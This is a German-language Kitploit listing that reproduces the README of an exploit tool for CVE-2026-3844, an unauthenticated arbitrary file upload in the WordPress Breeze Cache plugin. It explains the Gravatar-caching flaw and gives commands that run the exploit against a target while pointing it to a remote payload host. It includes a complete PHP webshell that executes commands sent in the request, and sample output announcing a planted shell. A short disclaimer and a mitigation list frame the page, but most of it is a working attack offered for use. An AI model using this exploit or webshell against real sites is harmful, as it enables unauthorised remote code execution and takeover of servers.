Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-3844 — WordPress – Breeze Cache <= 2.4.4 – Nicht authentifizierter beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
SchwachstellenscannerExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress – Breeze Cache <= 2.4.4 – Nicht authentifizierter beliebiger Datei-Upload

Repository anzeigen
11vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - Nicht authentifizierter beliebiger Datei-Upload

MIT License Python 3.6+ WordPress


⚠️ Haftungsausschluss

root@kitploit:~
DIESES TOOL WIRD NUR FÜR BILDUNGS- UND SICHERHEITSFORSCHUNGSZWECKE BEREITGESTELLT.
Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf
Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch diese Software verursacht werden.

📋 Beschreibung

CVE-2026-3844 ist eine kritische, nicht authentifizierte Schwachstelle für beliebige Datei-Uploads im Breeze Cache-Plugin für WordPress (Versionen ≤ 2.4.4). Das Plugin validiert den srcset-Parameter in Kommentaren nicht ordnungsgemäß, wodurch entfernte Angreifer bösartige Dateien (einschließlich Webshells) auf den Server hochladen können.

🔴 Schweregrad

  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Erforderliche Authentifizierung: Nein
  • Auswirkung: Remote-Code-Ausführung (RCE)

🎯 Betroffene Versionen

  • Breeze Cache ≤ 2.4.4
  • WordPress alle Versionen (pluginabhängig)

🔧 Technische Details

Die Schwachstelle nutzt die Gravatar-Caching-Funktionalität in Breeze aus. Wenn ein Kommentar mit einem speziell gestalteten srcset-Parameter veröffentlicht wird, der eine entfernte Datei-URL enthält, lädt Breeze die Datei herunter und speichert sie lokal unter:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[random_marker][dateiendung]

Voraussetzung: Die Option „Host Files Locally - Gravatars" muss in den Breeze-Einstellungen aktiviert sein.

🚀 Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# Abhängigkeiten installieren
pip install pycurl termcolor

💻 Verwendung

Grundlegende Verwendung

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

Erweiterte Optionen

root@kitploit:~
# Prüfen, ob das Ziel verwundbar ist, ohne Ausnutzung
python3 CVE-2026-3844.py -u http://target.com --check-only

# Benutzerdefinierte Payload-URL verwenden
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# Ausgabe in Datei speichern
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# Timeout für langsame Ziele erhöhen
python3 CVE-2026-3844.py -u http://target.com --timeout 30

Befehlszeilenargumente

ArgumentBeschreibung
-u, --urlZiel-URL (erforderlich)
-p, --payloadEntfernte Payload-URL
--timeoutAnfrage-Timeout in Sekunden (Standard: 15)
--check-onlyNur prüfen, ob das Ziel verwundbar ist
-o, --outputShell-URL in Datei speichern

📝 Beispiel für benutzerdefinierte Payload

Erstellen Sie Ihre eigene Webshell (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Hosten Sie sie an einem zugänglichen Ort und verwenden Sie dann:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 Verifizierungszeichenfolge

Der Exploit prüft automatisch auf die Verifizierungszeichenfolge 4356452d323032362d33383434 (hex-kodiert „CVE-2026-3844") in der hochgeladenen Datei, um eine erfolgreiche Ausnutzung zu bestätigen.

🛡️ Gegenmaßnahmen

  1. Breeze Cache auf Version 2.4.5 oder höher aktualisieren
  2. „Host Files Locally - Gravatars" deaktivieren, falls nicht benötigt
  3. Web Application Firewall (WAF)-Regeln implementieren
  4. Kommentarfunktionalität regelmäßig überwachen

📸 Screenshot

root@kitploit:~
[*] PHASE 1: SCHWACHSTELLENBEWERTUNG
[*] Prüfe Breeze-Plugin-Version...
[+] Ziel VERWUNDBAR (Breeze v2.4.4)

[*] PHASE 2: AUSNUTZUNG
[!] ANFORDERUNG: 'Host Files Locally - Gravatars' MUSS AKTIVIERT SEIN
[*] Schritt 1: Sende bösartigen Kommentar...
[+] Kommentar erfolgreich veröffentlicht
[*] Schritt 2: Warte, bis Breeze die Datei cached...
[*] Schritt 3: Prüfe auf hochgeladene Datei...
[+] Datei gefunden unter: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFIZIERUNGSZEICHENFOLGE GEFUNDEN - EXPLOIT ERFOLGREICH!

[✓] STATUS: ERFOLG
[✓] WEBSHELL-URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 Verzeichnisstruktur

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Haupt-Exploit-Skript
├── README.md            # Diese Datei
└── LICENSE              # MIT-Lizenz

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE-Datei für Details.

🙏 Danksagungen

  • Autor: 0xgh057r3c0n
  • Entdeckung: Sicherheitsforschungsteam
  • CVE-ID: CVE-2026-3844

📞 Kontakt

  • GitHub: @0xgh057r3c0n
  • Probleme melden: GitHub Issues

⭐ Unterstützung

Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen Stern ⭐ auf GitHub!


Erstellt mit 🐍 Python | Nur für Bildungszwecke
Tool herunterladen